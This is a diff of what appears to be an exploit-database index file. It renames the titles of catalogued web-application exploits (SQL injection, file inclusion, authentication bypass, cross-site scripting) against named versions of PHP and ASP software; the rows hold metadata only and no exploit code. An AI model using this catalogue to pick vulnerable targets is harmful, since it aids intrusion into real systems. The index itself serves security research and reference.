 6553,platforms/php/webapps/6553.txt,"PHPcounter 1.3.2 - (defs.php l) Local File Inclusion",2008-09-24,dun,php,webapps,0
@ -19434,7 +19448,7 @@ id,file,description,date,author,platform,type,port
 6557,platforms/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,php,webapps,0
 6558,platforms/php/webapps/6558.txt,"barcodegen 2.0.0 - Local File Inclusion",2008-09-24,dun,php,webapps,0
 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0
-6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection",2008-09-25,InjEctOr5,php,webapps,0
+6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - 'seller_id' Parameter SQL Injection",2008-09-25,InjEctOr5,php,webapps,0
 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 - (design) Local File Inclusion",2008-09-25,dun,php,webapps,0
 6563,platforms/php/webapps/6563.txt,"PHPOCS 0.1-beta3 - (index.php act) Local File Inclusion",2008-09-25,dun,php,webapps,0
 6564,platforms/php/webapps/6564.txt,"Vikingboard 0.2 Beta - (task) Local File Inclusion",2008-09-25,dun,php,webapps,0
@ -19599,7 +19613,7 @@ id,file,description,date,author,platform,type,port
 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 - Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0
 6780,platforms/php/webapps/6780.txt,"zeeproperty - 'adid' SQL Injection",2008-10-18,"Hussin X",php,webapps,0
 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection",2008-10-18,Xianur0,php,webapps,0
-6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
+6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - 'del.php' Blind SQL Injection",2008-10-18,StAkeR,php,webapps,0
 6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload",2008-10-18,EgiX,php,webapps,0
 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation",2008-10-18,StAkeR,php,webapps,0
 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0
@ -19709,12 +19723,11 @@ id,file,description,date,author,platform,type,port
 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'Directory.php cat' SQL Injection",2008-11-01,Hakxer,php,webapps,0
 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - 'id' SQL Injection",2008-11-01,ZoRLu,php,webapps,0
 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0
 6927,platforms/php/webapps/6927.txt,"AJ Article - 'featured_article.php mode' SQL Injection",2008-11-01,Mr.SQL,php,webapps,0
 6928,platforms/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0
 6929,platforms/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0
 6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0
 6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - 'details.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0
-6932,platforms/php/webapps/6932.txt,"AJ ARTICLE - (Authentication Bypass) SQL Injection",2008-11-01,Hakxer,php,webapps,0
+6932,platforms/php/webapps/6932.txt,"AJ Article 1.0 - Authentication Bypass",2008-11-01,Hakxer,php,webapps,0
 6933,platforms/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote Add/Delete/Password Change Exploit",2008-11-01,StAkeR,php,webapps,0
 6934,platforms/php/webapps/6934.txt,"Shahrood - 'ndetail.php id' Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps,0
 6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0
@ -19835,7 +19848,7 @@ id,file,description,date,author,platform,type,port
 7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
 7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
-7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0
+7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0
 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0
 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0
 7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection",2008-11-08,Cyber-Zone,php,webapps,0
@ -19850,7 +19863,7 @@ id,file,description,date,author,platform,type,port
 7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0
 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0
 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0
-7081,platforms/php/webapps/7081.txt,"AJ ARTICLE - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
+7081,platforms/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
 7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
 7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps,0
@ -19901,7 +19914,7 @@ id,file,description,date,author,platform,type,port
 7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
-7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0
+7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0
 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0
@ -20415,7 +20428,7 @@ id,file,description,date,author,platform,type,port
 7833,platforms/php/webapps/7833.php,"Joomla! Component com_waticketsystem - Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0
 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection",2009-01-19,"Danny Moules",php,webapps,0
 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0
-7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' SQL Injection",2009-01-20,snakespc,php,webapps,0
+7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' Parameter SQL Injection",2009-01-20,snakespc,php,webapps,0
 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution",2009-01-20,Osirys,php,webapps,0
 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion",2009-01-20,Stack,php,webapps,0
 7840,platforms/php/webapps/7840.pl,"Joomla! Component Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0
@ -20868,7 +20881,7 @@ id,file,description,date,author,platform,type,port
 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0
 8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0
 8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0
-8664,platforms/php/webapps/8664.pl,"BigACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
+8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0
 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0
 8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0
@ -20984,7 +20997,7 @@ id,file,description,date,author,platform,type,port
 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0
-8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps,0
+8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0
 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0
 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0
@ -21147,7 +21160,7 @@ id,file,description,date,author,platform,type,port
 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0
 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0
-9052,platforms/php/webapps/9052.txt,"BigACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
+9052,platforms/php/webapps/9052.txt,"BigACE 2.6 - 'cmd' Parameter Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0
 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0
@ -21195,7 +21208,7 @@ id,file,description,date,author,platform,type,port
 9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps,0
 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0
 9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0
-9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
+9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0
 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0
@ -21367,7 +21380,7 @@ id,file,description,date,author,platform,type,port
 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0
 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0
 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0
-9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection",2009-08-18,NoGe,php,webapps,0
+9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0
 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0
 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
@ -21569,8 +21582,8 @@ id,file,description,date,author,platform,type,port
 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,php,webapps,0
 9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,php,webapps,0
 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0
-9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - store() SQL Injection",2009-10-26,bookoo,php,webapps,0
+9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - 'store()' SQL Injection",2009-10-26,bookoo,php,webapps,0
-9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - post.php SQL Injection",2009-10-26,bookoo,php,webapps,0
+9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - 'post.php' SQL Injection",2009-10-26,bookoo,php,webapps,0
 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
 33434,platforms/windows/webapps/33434.rb,"HP Release Control - Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80
 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",hardware,webapps,80
@ -23604,7 +23617,7 @@ id,file,description,date,author,platform,type,port
 14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0
 14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,php,webapps,0
 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0
-14354,platforms/php/webapps/14354.txt,"AJ Article - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
+14354,platforms/php/webapps/14354.txt,"AJ Article 3.0 - Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
 14356,platforms/php/webapps/14356.txt,"CustomCMS - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
 14357,platforms/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication Bypass",2010-07-14,D4rk357,php,webapps,0
 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0
@ -25586,7 +25599,7 @@ id,file,description,date,author,platform,type,port
 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0
 20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0
-21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
+21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0
 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",php,webapps,0
 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
@ -27972,7 +27985,7 @@ id,file,description,date,author,platform,type,port
 26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0
 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0
 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0
-26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections",2005-08-22,"James Bercegay",php,webapps,0
+26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",php,webapps,0
 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
@ -28583,7 +28596,7 @@ id,file,description,date,author,platform,type,port
 26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - article.php SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0
 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0
 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - news.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0
-26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - Type Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0
+26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0
 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0
 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0
 26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0
@ -28651,7 +28664,7 @@ id,file,description,date,author,platform,type,port
 27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,php,webapps,0
 27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php' page Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0
 27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - dv_gbook.php f Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0
-27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - Bigshow.php Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0
+27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0
 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0
 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0
 27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
@ -28788,7 +28801,7 @@ id,file,description,date,author,platform,type,port
 27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
 27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
 27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
-27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - PMLite.php SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0
+27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0
 27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0
 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0
 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0
@ -28809,7 +28822,7 @@ id,file,description,date,author,platform,type,port
 27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 - show_news.php Cross-Site Scripting",2006-02-20,imei,php,webapps,0
 27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0
 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0
-27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - Ratefile.php Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0
+27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0
 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0
 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps,0
 27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Inclusion",2006-02-22,trueend5,php,webapps,0
@ -28827,7 +28840,7 @@ id,file,description,date,author,platform,type,port
 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0
 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0
 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0
-27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
+27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0
 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0
 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0
@ -28941,9 +28954,9 @@ id,file,description,date,author,platform,type,port
 27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 - month.php SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0
 27443,platforms/php/webapps/27443.txt,"Extcalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,php,webapps,0
 27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - Class_DB_MySQL.php Cross-Site Scripting",2006-03-18,r57shell,php,webapps,0
-27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0
+27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' SQL Injection",2006-03-18,Linux_Drox,php,webapps,0
-27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
+27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
-27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
+27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - 'cart.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
 27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0
 27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0
 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0
@ -29516,7 +29529,7 @@ id,file,description,date,author,platform,type,port
 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0
 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0
 28261,platforms/php/webapps/28261.txt,"RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0
-28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - Page Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0
+28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0
 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0
